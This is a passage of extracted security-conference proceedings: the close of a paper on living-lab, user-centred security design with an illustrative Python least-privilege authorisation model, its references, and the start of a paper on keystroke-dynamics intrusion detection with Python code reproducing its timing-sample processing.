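As an added illustration (not code from the Overture project or from the paper), the following Python model captures the three things the plumbers asked for in section 4.1 together with the least-privilege “secure by default” rule of this section: every role starts with no rights, an action is allowed only when the role holds both an explicit grant and a need-to-know clearance for the resource’s information class, and a separation-of-duties constraint refuses to let one role accumulate both halves of a sensitive workflow. The role names, information classes, resources and grants are assumptions constructed for the example.

```python
"""Default-deny authorisation model: least privilege, need to know and
separation of duties. Added example; the roles, information classes and
grants below are constructed assumptions, not the Overture platform's policy."""
from dataclasses import dataclass, field
from enum import IntEnum


class Classification(IntEnum):
    """Information classes, ordered from least to most sensitive (constructed)."""
    PUBLIC = 0
    INTERNAL = 1
    FINANCIAL = 2


@dataclass(frozen=True)
class Resource:
    name: str
    classification: Classification


@dataclass
class Policy:
    # role -> resource name -> set of explicitly granted actions; anything absent is denied
    grants: dict = field(default_factory=dict)
    # role -> highest information class the role has a need to know; absent means PUBLIC only
    clearance: dict = field(default_factory=dict)
    # action pairs that separation of duties forbids one role from holding on the same resource
    separated: frozenset = frozenset()

    def actions_for(self, role: str, resource: Resource) -> set:
        return self.grants.get(role, {}).get(resource.name, set())

    def grant(self, role: str, resource: Resource, action: str) -> None:
        """Add one explicit grant, refusing it if it would collapse a separated pair."""
        held = self.actions_for(role, resource)
        for pair in self.separated:
            if action in pair:
                other = pair[1] if action == pair[0] else pair[0]
                if other in held:
                    raise ValueError(
                        f"separation of duties: {role} cannot hold both "
                        f"{pair[0]!r} and {pair[1]!r} on {resource.name}")
        self.grants.setdefault(role, {}).setdefault(resource.name, set()).add(action)

    def allowed(self, role: str, resource: Resource, action: str) -> bool:
        """Secure by default: deny unless the role has both the clearance and the grant."""
        if resource.classification > self.clearance.get(role, Classification.PUBLIC):
            return False  # need to know: this role is not cleared for the information class
        return action in self.actions_for(role, resource)


# Constructed resources: a plumber's job card and a customer invoice.
JOB_CARD = Resource("job_card", Classification.INTERNAL)
INVOICE = Resource("invoice", Classification.FINANCIAL)


def build_policy() -> Policy:
    """Constructed policy for the roles the text names; every other role gets nothing."""
    policy = Policy(separated=frozenset({("submit_invoice", "approve_invoice")}))
    policy.clearance.update({
        "plumber": Classification.INTERNAL,
        "project_manager": Classification.FINANCIAL,
        "financial_controller": Classification.FINANCIAL,
        "administrator": Classification.INTERNAL,
    })
    policy.grant("plumber", JOB_CARD, "read")
    policy.grant("plumber", JOB_CARD, "update")
    policy.grant("project_manager", JOB_CARD, "read")
    policy.grant("project_manager", JOB_CARD, "assign")
    policy.grant("project_manager", INVOICE, "submit_invoice")
    policy.grant("financial_controller", INVOICE, "read")
    policy.grant("financial_controller", INVOICE, "approve_invoice")
    policy.grant("administrator", JOB_CARD, "read")
    # An over-broad grant a reviewer missed: administrators manage accounts but
    # have no need to know invoice amounts, so the clearance check still denies it.
    policy.grant("administrator", INVOICE, "read")
    return policy


def separation_enforced(policy: Policy) -> bool:
    """True if the policy refuses to let the approver also become the submitter."""
    try:
        policy.grant("financial_controller", INVOICE, "submit_invoice")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    p = build_policy()
    checks = [
        ("plumber", JOB_CARD, "update"),                       # granted -> True
        ("plumber", JOB_CARD, "delete"),                       # never granted -> False
        ("administrator", INVOICE, "read"),                    # granted but not cleared -> False
        ("guest", JOB_CARD, "read"),                           # unknown role -> False
        ("financial_controller", INVOICE, "approve_invoice"),  # granted and cleared -> True
    ]
    for role, res, act in checks:
        print(f"{role:21} {act:16} on {res.name:9} -> {p.allowed(role, res, act)}")
    print("separation of duties enforced:", separation_enforced(p))
```

The administrator case is the one worth noticing: a grant alone is not enough, so a mistaken “read everything” entry does not leak financial data to a role that has no need to know it.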
4.4 Ground up security
In this paper, a “ground up” approach refers to the process of developing security systems starting from the needs and requirements of the target end users on the ground (Ghosh, Howell & Whittaker 2002; Vacca 2010:17). Only a “ground up” approach has the potential to help security system designers and developers develop systems that are in line with what the end users need. Systems meant for the end users definitely require end user input, and the end users must be treated as the major stakeholder.
The target end users on the ground are required to continue providing their inputs throughout the lifecycle of the development process in an iterative manner, as reflected in Figure 1. This means that, after the system has been developed, it goes to the end users for testing and evaluation. The end users provide their feedback, which is taken as input to the next iteration of the design and development cycle. The Overture LL environment provided the platform to ensure that all requirements, especially those from end users, were considered early enough to avoid technology misappropriation.
5. Conclusion and future work
A LL approach is one way of achieving user-centred security systems. However, it is worth noting that a LL approach is not a silver bullet for solving the issue of user-centric design and development of security systems; it is just one piece of the puzzle. With the emphasis on the end users, the limitation of this approach is that it is likely to dictate only the inclusion of features in response to the end user needs, which quite often are not even feasible to implement. Surely, a LL approach will put more focus on the end users, but knowing what the end users need and then providing them exactly that may not be good enough. This was one of the key lessons learnt. If we are to design technology game-changers with the potential to make a real socio-economic difference to society, we need to look beyond what the end users need, into the things that they are not even aware they need. This will require an insightful understanding and visibility of the end user needs, motivations, context, conditions, behaviour and environment. We need to understand the end users better than they understand themselves, in a similar manner to the customer profiling which determines the risk profile or creditworthiness of potential customers in insurance companies and financial institutions, respectively. The Overture LL has provided us with just that.
A comprehensive view of security system design and development will include requirements that are raised by the need to comply with industry standards and regulatory compliance mandates. Best practices and functional and non-functional requirements complete the other pieces of the puzzle. This is left as future work.
Acknowledgement
The support of SAP Research Pretoria/Meraka Unit of Technology Development/National Research Foundation towards this research is hereby acknowledged. Opinions expressed and conclusions arrived at are solely those of the authors and should not necessarily be attributed to SAP Research/Meraka UTD/National Research Foundation. We would like to thank Rubina Adam and Prof. Marlien Herselman for their insightful comments and contribution to this paper.
References
Adams, A. and Sasse, M.A. (1999). Users are not the Enemy: Why Users Compromise Computer Security Mechanisms and How to Take Remedial Measures, Communications of the ACM, Vol. 42, No. 12, December 1999, pp. 40-46.
Asher, C., Aumasson, J.-P. and Phan, R. C.-W. (2009). Security and privacy preserving in human-involved networks, in the 50th Proceedings of the iNetSec Conference, 23-24 April 2009, Zurich, Switzerland.
Balfanz, D., Durfee, G., Smetters, D.K. and Grinter, R.E. (2004). In Search of Usable Security: Five Lessons from the Field, Journal of the IEEE Security and Privacy, IEEE Computer Society, September/October 2004, Vol. 2, No. 5, pp. 19-24.
Ben-Asher, N., Meyer, J., Möeller, S. and Englert, R. (2009). An Experimental System for Studying the Tradeoff between Usability and Security, ARES 2009, pp. 882-887, 2009 International Conference on Availability, Reliability and Security, 2009, Fukuoka, Japan.
Ben-Asher, N., Meyer, J., Parmet, Y., Moeller, S. and Englert, R. (2010). An experimental microworld for evaluating the trade-off between usability and security, The 6th Symposium On Usable Privacy and Security, SOUPS 2010, 14-16 July 2010, Redmond, WA.
Braz, C., Seffah, A. and M’Raihi, D. (2007). Designing a Trade-off between Usability and Security: A metrics based-Model, Human-Computer Interaction, INTERACT 2007, Lecture Notes in Computer Science, 2007, Vol. 4663, No. 2007, pp. 114-126.
Dlamini, M.T. (2010). The Economics of Information Security, MSc dissertation, University of Pretoria, available at: http://upetd.up.ac.za/thesis/available/etd-09202010-174918/, accessed 08 January 2011.
Dlamini, M.T., Eloff, J.H.P. and Eloff, M.M. (2009). Information Security: The Moving Target, Computers & Security Journal, Elsevier, Vol. 28, No. 3-4, May-June 2009, pp. 189-198.
Emil, J. (2010). Security – Functionality – Usability Trade-off, available online at: http://emilonsecurity.wordpress.com/2010/10/17/security-functionality-usability-security-trade-off/, accessed 11 January 2011.
Faily, S. and Flechais, I. (2010). Security Through Usability: A user-centered approach for balanced security policy requirements, 2010 Annual Computer Security Applications Conference, ACSAC 2010, 6-10 December 2010, Texas, USA.
Folstad, A. (2008). Living Labs For Innovation and Development of Information and Communication Technology: A Literature Review, The Electronic Journal for Virtual Organizations and Networks, Vol. 10, Special Issue on Living Labs, August 2008, pp. 99-131.
Ghosh, A.K., Howell, C. and Whittaker, J.A. (2002). Building Software Securely from the Ground Up, Journal of IEEE Software, IEEE Computer Society Press, Vol. 19, No. 1, January/February 2002, pp. 14-16.
Holmstrom, U. (1999). User-centered design of security software, The 17th International Symposium of Human Factors in Telecommunications, May 1999, Copenhagen, Denmark.
Izadi, S., Hodges, S., Butler, A., West, D., Rrustemi, A. and Molloy, M. (2009). ThinSight: a thin form-factor interactive surface technology, Communications of the ACM, Vol. 52, No. 12, December 2009, pp. 90-98.
Jaferian, P., Botta, D., Hawkey, K. and Beznosov, K. (2009). A multi-method approach for user-centered design of identity management systems, The 5th Symposium On Usable Privacy and Security, SOUPS 2009, 15-17 July 2009, Mountain View, Canada.
Lipner, S. and Howard, M. (2005). The Trustworthy Computing Security Development Lifecycle, White Paper, Microsoft Corporation, March 2005, available online at: http://msdn.microsoft.com/en-us/library/ms995349.aspx, accessed 12 January 2011.
Miller, J. (2004). Why “Secure By Default” is a step in the right direction, available online at: http://www.securityfocus.com/columnists/241, accessed 12 January 2011.
Miller, M.J. (2010). Cybersecurity 2010: Technology alone cannot solve this problem, available online at: http://blogs.globalcrossing.com/?q=content/cybersecurity-2010-technology-alone-cannot-solveproblem, accessed 08 January 2011.
Nohlberg, M. and Bäckström, J. (2007). "User-centred security applied to the development of a management information system", Journal of Information Management & Computer Security, Vol. 15, No. 5, pp. 372-381.
Patrick, A.S., Long, A.C. and Flinn, S. (2003). HCI and Security Systems, HCI and Security Systems: A CHI 2003 Workshop, CHI 2003, 5-10 April 2003, Florida, USA.
Payne, B.D. and Edwards, W.K. (2008). A brief introduction to Usable Security, IEEE Journal of Internet Computing, Vol. 12, No. 3, May 2008, pp. 13-21.
Rahaman, A. and Sasse, M.A. (2010). A framework for the lived experience of identity, IDIS 2010, Vol. 3, No. 3,
December 2010, pp. 605-638.<br />
79
Moses Dlam<strong>in</strong>i et al.<br />
Santoro, R. and Conte, M (2009). Liv<strong>in</strong>g Labs <strong>in</strong> Open Innovation Functional regions, Whitepaper, available onl<strong>in</strong>e at:<br />
http://www.ami-communities.eu/pub/bscw.cgi/d441945/Liv<strong>in</strong>g%20Labs%20<strong>in</strong>%20Functional%20Regions%20-<br />
%20White%20Paper.pdf, accessed 20 December 2010.<br />
Sasse, A.M., Brostoff, S. and Weirich, D. (2001). Transform<strong>in</strong>g the Weakest L<strong>in</strong>k – a Human/Computer Interaction<br />
Approach to Usable and Effective <strong>Security</strong>, BT Technology Journal, Vol. 19, No. 3, 1 July 2001, pp. 122-131.<br />
Schaffers, H., Merz, C., Guzman, J.G. and Navarro, M. (2009). Liv<strong>in</strong>g Labs and Rural Development Overview of the<br />
C@R Project, The Electronic Journal for Virtual Organizations and Networks, eJOV, Vol. 11, 2009, pp. 1-8.<br />
Schneier, B. (2000). Secrets and Lies: Digital security <strong>in</strong> a networked world, John Wiley and Sons, Inc, USA.<br />
Schumacher, J. (2008). Liv<strong>in</strong>g Labs <strong>in</strong> Future ICT Research, Presentation Slides, Swiss ICT Summit, 10 October<br />
2008, Lugano, Swirtzerland, available onl<strong>in</strong>e at: http://www.ictsummit.eu/template/fs/documents/10_LL-<br />
Schumacher.pdf, accessed 08 December 2010.<br />
S<strong>in</strong>ha, A. and Sprague, S. (2008). Bus<strong>in</strong>ess Beyond Boundaries: Ga<strong>in</strong><strong>in</strong>g Competitive Advantage <strong>in</strong> a Global<br />
Economy, A Jo<strong>in</strong>t SAP and Crossgate WhitePaper, available onl<strong>in</strong>e at:<br />
http://www.edispecialists.com/newsletter/SAP_and_Crossgate_Bus<strong>in</strong>ess%20Network%20Transformation.pdf,<br />
accessed 08 December 2010.<br />
Smith, S.W. (2003). Humans <strong>in</strong> the Loop: Human-Computer Interaction and <strong>Security</strong>, IEEE <strong>Security</strong> & Privacy<br />
Journal, IEEE Computer Society, Vol. 1, No. 3, May 2003, pp. 75-79.<br />
Vacca, J.A. (2010). Manag<strong>in</strong>g Information <strong>Security</strong>, Elservier 2010, USA.<br />
Van der Walt, J.S., Buitendag, A.A.K., Zaaiman, J.J. and van Vuuren, J.C.J. (2009). Community Liv<strong>in</strong>g Lab as a<br />
Collaborative Innovation Environment, Journal of Information Science and Information Technology, Vol. 6, No.<br />
2009, pp. 421-436.<br />
Vidyaraman, S. (2008). Gust: Game Theoric user-centered security design technique, PhD Thesis, State University<br />
of New York, USA.<br />
Zurko, M. E. (2005). User-centered <strong>Security</strong>: Stepp<strong>in</strong>g Up to the Grand Challenge, Proceed<strong>in</strong>gs of the 21 st Annual<br />
Computer <strong>Security</strong> Applications Conference, ACSAC 2005, IEEE Computer Society, 5-9 December 2005,<br />
Tucson, Arizona.<br />
Zurko, M.E. and Simon, R.T. (1997). User-centered <strong>Security</strong>, Proceed<strong>in</strong>gs of the 1996 New <strong>Security</strong> paradigms<br />
Workshop, CA.<br />
80
Intrusion Detection Through Keystroke Dynamics<br />
João Ferreira 1,2, Henrique Santos 1 and Bernardo Patrão 2<br />
1 University of Minho, Braga, Portugal<br />
2 Critical Software S.A., Coimbra, Portugal<br />
jpedrossferreira@gmail.com<br />
hsantos@dsi.uminho.pt<br />
bnf-patrao@criticalsoftware.com<br />
Abstract: With the ever-increasing number of internal attacks towards information systems, Intrusion Detection Systems (IDSs) have become a necessary addition to the security policy of nearly every organization. An IDS is responsible for monitoring the events occurring in a computer system or network and analyzing them for signs of possible violations of security policies. At the host level, current IDSs (Host-Based IDSs) typically perform file integrity checking, monitoring of key file-system objects, log analysis, and other functions capable of revealing malicious alterations of the system state. A major drawback of this approach is its inherent inability to detect "legal" operations when they are performed by an intruder who has gained access through legitimate credentials, possibly causing considerable damage. Currently, authentication mechanisms are the only barrier against these attacks. The most common means of authentication is the password, often used in conjunction with tokens or biometric readings for increased security. However, these mechanisms do not offer continuous verification as IDSs do. One promising solution to this issue is to extend the IDS concept to the user authentication level, using anomaly-based detection to distinguish benign activity from malicious activity. Applying this concept with a focus on the user requires tracking user profiles, which leads us to biometric features. Keystroke dynamics is a behavioral biometric technique that satisfies this goal. Besides being non-intrusive and inexpensive, keystroke analysis is also very attractive because typing patterns remain continuously available after the authentication phase. The development of such an IDS is the main motivation for the work described in this paper. In order to preserve the attractiveness of this technology, the solution must face a set of challenges. It should be transparent to the user, and therefore its execution (gathering typing rhythms, building user samples, computing comparison scores, and refining the stored profile through learning) must be performed without imposing restrictions on user input and without a visual interface. It must also be generic with respect to the keyboard type. Other important challenges come from the need to deal with unrestrained text input. Lastly, the security of the captured data and the possibility of enabling future prevention measures by offering asynchronous detection capabilities are also considered.<br />
Keywords: keystroke dynamics, biometrics, host-based intrusion detection, authentication, security, anomaly-based detection<br />
1. Introduction<br />
Critical information is progressively being handled in digital format, a consequence of the reigning Information Era. Proportionately, as the value of digital information escalates, cyber-attacks become increasingly threatening and popular. Protecting that information is therefore a growing necessity. Among the several security technologies that have emerged, User Authentication (within the context of Access Control Policies) plays a very important role as a first control on user/machine interaction. Password-based authentication mechanisms are currently the most common way to assure that the user is who he/she is supposed to be.<br />
To the trusted user, authentication mechanisms offer a reasonable layer of protection against intruders. However, once the authentication phase is passed, the user is considered successfully identified and no further proof of identity is usually required. This lack of continuous identity verification is a severe access control vulnerability that allows for opportunistic attacks, especially from insiders. Insiders are unavoidable, trusted, and have access and opportunity. Studies show that 60 to 70 percent of cyber-attacks come from insiders (Lynch, 2006), and several more are missed by these statistics, since a significant number of insider attacks exploit some sort of password abuse and are not detected (Schultz, 2002).<br />
For example, whenever a user leaves his/her workstation in a logged-in state, an attacker nearby can use it to access critical information; in another ordinary scenario, an intruder can persuade a legitimate user to let him use his computer just to read the mail or do some other apparently innocent task, and then, maliciously, do something else. Mitigating this threat with more frequent authentication challenges is not a valid option, since it would be inconvenient to the user, who could ultimately look for workarounds that would pose even greater security risks. Therefore, a better solution is the adoption of a technique that passively and continuously monitors the user's interactions, searching for some proof of intrusion.<br />
81
João Ferreira et al.<br />
Host-based Intrusion Detection Systems (HIDSs) satisfy most of these conditions. However, current IDSs are focused on the system (instead of the user). As a consequence, system-safe actions are considered legal (no matter who is really behind them), and it is still possible (in fact, very easy) for an attacker to execute malicious actions even with such a security control in place.<br />
To better address that issue, we propose a solution based on keystroke dynamics biometrics, adequately adapted to the intrusion detection operation. In this paper we describe the architecture of the solution and the keystroke dynamics method implemented to passively and continuously authenticate the user. In section 2 biometric concepts are introduced and justified as the correct option for user authentication within the context of a HIDS function. In section 3 the choice of keystroke dynamics is explained, as well as different approaches published in the literature for similar applications. Section 4 contains a description of related work. In section 5 we describe the architecture of the proposed solution, giving details of its main modules and explaining how key concepts were addressed during the design phase. Section 6 describes the experimental environment of this solution, and we wrap up the paper with some concluding remarks in section 7.<br />
2. Biometrics<br />
Biometric technologies can be used for two main objectives: identification and authentication. In the former case, a biometric trait is matched against the entire content of a previously captured biometric database – this can be a huge problem, especially for very large databases. In the latter case a biometric trait is used to verify whether it matches one previously stored and belonging to the user enrolled with the system – the matching process is simpler, but precision is a main concern to avoid false negatives (negative authentication of a legitimate user) and false positives (positive authentication of an impersonator).<br />
Before taking biometric technologies as a solution for the authentication problem it is useful to compare them with the alternatives.<br />
Authentication mechanisms are typically divided into three classes (Liu and Silverman, 2001):<br />
Based on something the user knows (or knowledge based) – the most common means of authentication; includes passwords and personal identification numbers (PINs). These suffer from the possibility of being easily duplicated, even without the user's consent. Complex passwords can be forgotten (and because of that they are often stored or written down, increasing the risk of theft), while simple passwords may be easily guessed, cracked or offered to an ill-intentioned con artist.<br />
Based on something the user has (or possession based) – keys and authentication tokens. Usually used in conjunction with PINs or passwords, these help increase security, but can be easily lost, borrowed or stolen.<br />
Based on something the user is (or identity based) – the field of biometric security. While currently the least commonly deployed mechanisms in computer systems, they are believed to represent an effective means of authentication. More importantly, they come with the added bonus of better protection of the authentication data from duplication, loss or theft, since the data source is the user in question. Concerning user intrusion detection based on authentication, biometrics is the only technology that allows an effective link between users and their respective credentials. So, it is on biometric analysis that this paper is focused.<br />
Biometric features are commonly divided into two categories: physiological and behavioral features. The physiological features include face, retinal or iris patterns, fingerprints, palm topology, hand geometry, wrist veins and thermal images. On the other hand, behavioral features include voiceprints, keystroke dynamics, handwritten signatures and gait (Bergadano, Gunetti and Picardi, 2002).<br />
Physiological features are currently the most successfully implemented, due to the high variability of behavioral features – which can vary greatly between consecutive samplings, since they depend on a human user's performance. Another drawback of many biometric techniques is the requirement for specific equipment, such as scanners or special cameras, in order to sample the required characteristics. Most users are also wary of using intrusive equipment (such as retinal scanners, for example).<br />
In the HIDS context, a biometric technique can only be used if the user's analyzed trait can be continuously sampled – which is rare for this kind of technique. An attractive biometric technique would perform transparently and continuously without any additional equipment.<br />
3. Keystroke dynamics<br />
Fortunately it has been demonstrated that distinctive neurophysiological factors influence the typing patterns of human users interacting with a keyboard (Marsters, 2009). Using the keyboard as a source of biometric information is especially appealing due to the ever-availability of typing rhythms, independent of an authentication phase being passed (or fooled).<br />
Concerning the user's typing dynamics, on a standard keyboard connected to a Personal Computer we can extract the amount of time each key is held down (called dwell time), and the elapsed time between the release of the first key and the depression of the second (called flight time) (Monrose and Rubin, 2000). These atomic features are usually merged to form n-graphs, representing consecutive keystrokes (digraphs, trigraphs and fourgraphs being the most widely sampled graphs). Recent laptops feature 3-D accelerometer chips, and research on vibration-sensitive keystroke analysis has shown promising results (Lopatka and Peetz, 2009; Iwasaki, Miyaki and Rekimoto, 2009). However, this metric would not be usable in most situations (desktop computers; external keyboards; older laptops), harming the desired generality. The possibility of using the distance between keys as a valid metric was also studied, to no avail (Magalhães, 2005).<br />
Apart from the natural unreliability of the human user as a data source, a factor intrinsic to all behavioral biometric measuring, an authentication system based solely on keystroke timing information is of course susceptible to other problems. A considerable number of potential sources of noise might shift the user's behavior away from their normal typing profile. J.-D. Marsters (2009) listed some examples: weather conditions (a cold day might mean that a typist's fingers move more slowly), fatigue and stress, injury, and even a simple distraction (common in an office environment). All these factors can add a significant amount of noise to otherwise consistent typing.<br />
These variations will inevitably induce false positives and false negatives in any system based on behavioral biometrics. Valid solutions using keystroke dynamics need to take them into account, and try to mitigate their occurrence as much as possible.<br />
4. Related work<br />
In order to minimize the aforementioned typing instability, most research in the published literature chooses to control the text used to produce samples, asking for usernames, passwords, or fixed text paragraphs (Robinson et al., 1998; Lopatka and Peetz, 2009; Jiang, Shieh and Liu, 2007). It is believed that users tend to type familiar and well-practiced phrases with a more consistent rhythm (Robinson et al., 1998).<br />
There are currently very few approaches to the keystroke analysis of unrestrained text. Ahmed and Traore (2005) obtained a False Acceptance Rate (FAR) of 1.312% and a False Rejection Rate (FRR) of 0.651%, using trigraph-based keystroke analysis in conjunction with pointer dynamics. Unfortunately, the information provided about the experimentation process is very scarce.<br />
Downland and Furnell (2004) monitored 35 subjects for 3 months (nearly 6 million samples), obtaining an FRR of 4.9% for an FAR of 0%, which are very interesting results, but obtained via a computationally heavy process that would be impossible to implement in a system that needs to provide quick responses.<br />
J.-D. Marsters (2009) developed a system for transparent keystroke analysis with an FAR of around 2% for a near-zero FRR and a small user base of 10 participants. The author claims to be able to perform an identity verification in less than a minute, which is a result close to being acceptable for a "real" intrusion detection system.<br />
Finally, Gunetti and Picardi (2005) thoroughly researched the impact of multiple parameter variations in their study, obtaining (for a user base of 205 participants) a very interesting FRR of less than 5% and an FAR of less than 0.005% for their best-scoring implementation. Their two-factor (absolute and relative) scoring algorithm served as the basis for our proposed solution. Their samples were obtained by filling in an online text box (which guarantees that nearly every sample will consist of real text), which cannot be considered unrestrained text input – that would include coding, browsing, gaming, writing in different contexts and languages, etc.<br />
5. Proposed solution<br />
Figure 1 depicts the architecture of our proposed solution. Like typical systems based on biometric technology, this solution includes an initial enrollment phase, where the legitimate user is required to type a few lines of text (sample length will be discussed throughout this section) so that sufficient sample data is gathered. From that point on, the system is ready to recognize legitimate use, and enters the validation phase, the "normal" state that will be preserved during operation.<br />
In this state, every validation attempt (every typed sample) will be matched against the user's typing profile, outputting a score that will determine whether the attempt is valid. An attempt that passes validation will be added to the stored profile, ensuring that the user's profile is constantly updated, following the evolution of the user's typing dynamics. Attempts that fail to validate denounce the presence of an intruder and will trigger the prevention and reporting module. In the next sections we detail each of the main modules of the proposed solution.<br />
Figure 1: Architecture of the proposed solution<br />
5.1 Event logging<br />
This module is a lightweight software agent running in the background of every registered user's computer. It continuously logs the sequence of keystroke events (keydowns and keyups) generated by the user's typing, along with elapsed time measurements (with an accuracy of 0.01 milliseconds). This module is also responsible for filtering out unwanted events, like function keys, modifier keys, auto-repeat events (when a key is held down for more than half a second) and writing breaks. Table 1 exemplifies what the log looks like. The computational weight of this module needs to be kept to a minimum, since "imprisoning" keystroke events for an exaggerated amount of time could lead to noticeable delays in the system-wide responsiveness to keystrokes. This "typing lag" would bother the user and affect the desired transparency of the system. Therefore, the deep processing work is delegated to another module once a full sample is logged.<br />
Table 1: Log from typing the word "apples" (Time is the elapsed time since the previous event)<br />
Down Up Time<br />
A - 0<br />
- A 6386<br />
P - 14824<br />
- P 11512<br />
P - 5752<br />
L - 6594<br />
- P 4921<br />
- L 9056<br />
E - 4943<br />
- E 5752<br />
S - 5761<br />
- S 7393<br />
Establishing the size of a sample is an important decision. Longer samples imply an increased number of n-graphs, thus improving sample accuracy, since more shared n-graphs will be available for comparison (Gunetti and Picardi, 2005). However, shorter samples ensure a faster periodicity of the proposed solution's process. Based on this trade-off, we have opted for samples of 1500 events (around 750 characters).<br />
5.2 Sample processing<br />
This module is responsible for converting the received raw sample log into a structured and normalized sample. Table 2 illustrates how the logged samples (listed in the leftmost table) generate the subsamples used by this solution, for the different n-graphs.<br />
Table 2: Subsamples generated from the raw sample log<br />
Raw sample log: the events of Table 1.<br />
Dwell sample<br />
Graph Time<br />
A 6386<br />
E 5752<br />
L 13977<br />
P 11512, 11515<br />
S 7393<br />
Flight sample<br />
Graph Time<br />
A-P 14824<br />
E-S 5761<br />
L-E 4943<br />
P-L -4921<br />
P-P 5752<br />
Digraph sample<br />
Graph Time<br />
A+P 21210<br />
E+S 11513<br />
L+E 18920<br />
P+L 6594<br />
P+P 17264<br />
Trigraph sample<br />
Graph Time<br />
A+P+P 38474<br />
L+E+S 30433<br />
P+L+E 25514<br />
P+P+L 23858<br />
Fourgraph sample<br />
Graph Time<br />
A+P+P+L 45068<br />
P+L+E+S 37027<br />
P+P+L+E 42778<br />
Note the presence of negative values in the flight measurements. This is an example of overlapped typing (the result of pressing the succeeding key before releasing the previous one), very common in most users' typing samples. Some users overlap a set of key combinations with extreme consistency, a differentiating factor worth examining.<br />
Once the subsamples are built, execution proceeds by filtering outliers – typical of every behavioral biometric trait, given that human users as a source of data are naturally unpredictable. Outlier times are filtered out by applying the widely used Interquartile Range (IQR) rule. However, in a full sample many graphs are typed just once. In these cases, we determine whether their timing measure is in fact an outlier with respect to every other n-graph in its subsample – for example, if all trigraph times in a user's sample (there are around 500 trigraphs per sample) vary between 20000 and 40000, it is safe to assume that a trigraph with a time of 80000 is not natural to that user.<br />
Finally, this module calculates the mean and standard deviation for each graph, and outputs a fully processed user sample (subsamples similar to the ones in Figure 2, now with fields for mean, standard deviation and number of occurrences instead of Time). If the user is new to the system (enrollment phase), the sample goes straight to the user's profile stored in the database. In our proposed solution, a single stored sample is enough for the system to finish the enrollment phase and proceed to the validation phase. However, the accuracy of the decisions increases with more samples in storage, should the user be willing to certify that he is the only one typing on the computer (a requisite during the enrollment phase) for a longer period of time. The number of stored samples needed to enter the validation phase is customizable. If the user is already registered, the system will be in the validation phase – as a consequence, the sample will be labeled as an authentication attempt and sent to the Scores Calculation module.<br />
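The sample processing described in sections 3, 5.1 and 5.2, as an added example (not the authors' code): it rebuilds every Table 2 value from the Table 1 log, then applies the IQR filtering and per-graph statistics. It assumes that Table 1 times are elapsed since the previous event (unit assumed to be 0.01 ms), that an n-graph time runs from the keydown of its first key to the keydown of its last key, and that a per-graph IQR fence needs at least four occurrences (the threshold `min_per_graph` is a hypothetical parameter).

```python
"""Sample processing for the proposed solution (sections 3, 5.1, 5.2).

Added example, not the authors' code.  Assumptions: Table 1 times are
elapsed since the previous event (unit assumed to be 0.01 ms); an n-graph
time runs from the keydown of its first key to the keydown of its last
key (this reproduces every value in Table 2); a per-graph IQR fence
needs at least min_per_graph occurrences (a hypothetical parameter).
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed raw log: the word "apples" from Table 1 as
# (key, event, elapsed-since-previous-event) tuples.
APPLES_LOG = [
    ("A", "down", 0), ("A", "up", 6386),
    ("P", "down", 14824), ("P", "up", 11512),
    ("P", "down", 5752), ("L", "down", 6594),
    ("P", "up", 4921), ("L", "up", 9056),
    ("E", "down", 4943), ("E", "up", 5752),
    ("S", "down", 5761), ("S", "up", 7393),
]


def absolute_times(log):
    """Convert elapsed-time events into (key, event, absolute_time)."""
    t, out = 0, []
    for key, event, elapsed in log:
        t += elapsed
        out.append((key, event, t))
    return out


def build_subsamples(log, max_n=4):
    """Return {subsample: {graph: [times]}} for dwell, flight and 2..max_n-graphs.

    Flight time is next keydown minus this keyup, so overlapped typing (next
    key pressed before this one is released) gives a negative value, as for
    P-L in Table 2.
    """
    events = absolute_times(log)
    downs = [(k, t) for k, e, t in events if e == "down"]  # typing order
    # Pair each keydown with the next keyup of the same key.
    release, pending = {}, defaultdict(list)
    for k, e, t in events:
        if e == "down":
            pending[k].append(t)
        elif pending[k]:                 # ignore a keyup with no keydown
            release[(k, pending[k].pop(0))] = t
    sub = defaultdict(lambda: defaultdict(list))
    for i, (k, down) in enumerate(downs):
        if (k, down) not in release:     # key never released (sample cut)
            continue
        up = release[(k, down)]
        sub["dwell"][k].append(up - down)
        if i + 1 < len(downs):
            next_key, next_down = downs[i + 1]
            sub["flight"][f"{k}-{next_key}"].append(next_down - up)
        for n in range(2, max_n + 1):
            if i + n <= len(downs):
                keys = downs[i:i + n]
                name = "+".join(key for key, _ in keys)
                sub[f"{n}-graph"][name].append(keys[-1][1] - down)
    return sub


def iqr_bounds(values, k=1.5):
    """Fences of the IQR rule, [Q1 - k*IQR, Q3 + k*IQR], with linear interpolation."""
    s = sorted(values)
    if not s:
        return float("-inf"), float("inf")

    def quantile(q):
        pos = (len(s) - 1) * q
        lo = int(pos)
        hi = min(lo + 1, len(s) - 1)
        return s[lo] + (s[hi] - s[lo]) * (pos - lo)

    q1, q3 = quantile(0.25), quantile(0.75)
    return q1 - k * (q3 - q1), q3 + k * (q3 - q1)


def filter_outliers(subsample, min_per_graph=4):
    """IQR filtering per graph; a graph with too few occurrences (typically
    typed once) is judged against every time in its whole subsample."""
    pooled = iqr_bounds([t for ts in subsample.values() for t in ts])
    cleaned = {}
    for graph, times in subsample.items():
        lo, hi = iqr_bounds(times) if len(times) >= min_per_graph else pooled
        kept = [t for t in times if lo <= t <= hi]
        if kept:
            cleaned[graph] = kept
    return cleaned


def summarise(subsample):
    """Per-graph (mean, population std, hit count): the processed-sample fields."""
    return {g: (mean(ts), pstdev(ts), len(ts)) for g, ts in subsample.items()}


def process_sample(log):
    """Raw event log -> {subsample: {graph: (mean, std, n)}}.
    On a six-key word the pooled fences are crude; they are meant for a
    1500-event sample with hundreds of graphs per subsample."""
    return {name: summarise(filter_outliers(sub))
            for name, sub in build_subsamples(log).items()}


if __name__ == "__main__":
    for name, graphs in build_subsamples(APPLES_LOG).items():
        print(name, dict(graphs))   # reproduces the Table 2 values
```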
5.3 Scores calculation<br />
At this stage, we have a structured sample (the attempt) ready for evaluation. All samples from the user profile in a centrally managed database are imported into the application in order to perform the necessary comparisons. Sample length is a very important factor in the accuracy of a free-text keystroke dynamics algorithm (Gunetti and Picardi 2005; Hempstalk 2009), which is understandable, mainly because longer profile samples will share more n-graphs with the attempts. On the other hand, long samples force longer enrollment periods, make the system less responsive in passive mode (longer listening periods, and consequently fewer validation stages), and provide only a coarse update of the user's typing evolution.<br />
85
João Ferreira et al.<br />
Therefore, published solutions end up compromising on an average sample length, never benefiting from the advantages of both short and long samples.
